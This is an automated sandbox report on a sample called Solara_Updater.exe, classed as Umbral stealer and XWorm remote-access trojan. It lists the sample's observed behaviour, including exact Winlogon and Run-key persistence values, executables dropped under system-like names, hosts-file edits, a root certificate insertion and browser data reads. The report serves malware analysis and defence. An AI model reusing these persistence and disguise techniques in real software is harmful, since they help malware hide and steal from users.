Malware Analysis Report

2024-10-10 10:03

Sample ID 240519-tpx5faef98
Target Solara_Updater.exe
SHA256 4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
Tags
umbral xworm execution persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf

Threat Level: Known bad

The file Solara_Updater.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan

Detect Xworm Payload

Modifies WinLogon for persistence

Umbral

Detect Umbral payload

Process spawned unexpected child process

Xworm

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Drops startup file

Looks up external IP address via web service

Adds Run key to start application

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Views/modifies file attributes

Runs ping.exe

Modifies registry class

Detects videocard installed

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-19 16:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-19 16:14

Reported

2024-05-19 16:17

Platform

win7-20240508-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Program Files (x86)\Common Files\Services\wscript.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\hccjfr.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Common Files\Services\wscript.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files (x86)\Common Files\Services\817c8c8ec737a7 C:\hostNet\bridgeblockportComBroker.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\L2Schemas\WmiPrvSE.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File opened for modification C:\Windows\L2Schemas\WmiPrvSE.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Windows\L2Schemas\24dbde2999530e C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\69ddcba757bf72 C:\hostNet\bridgeblockportComBroker.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (binary certificate blob omitted) C:\hostNet\bridgeblockportComBroker.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
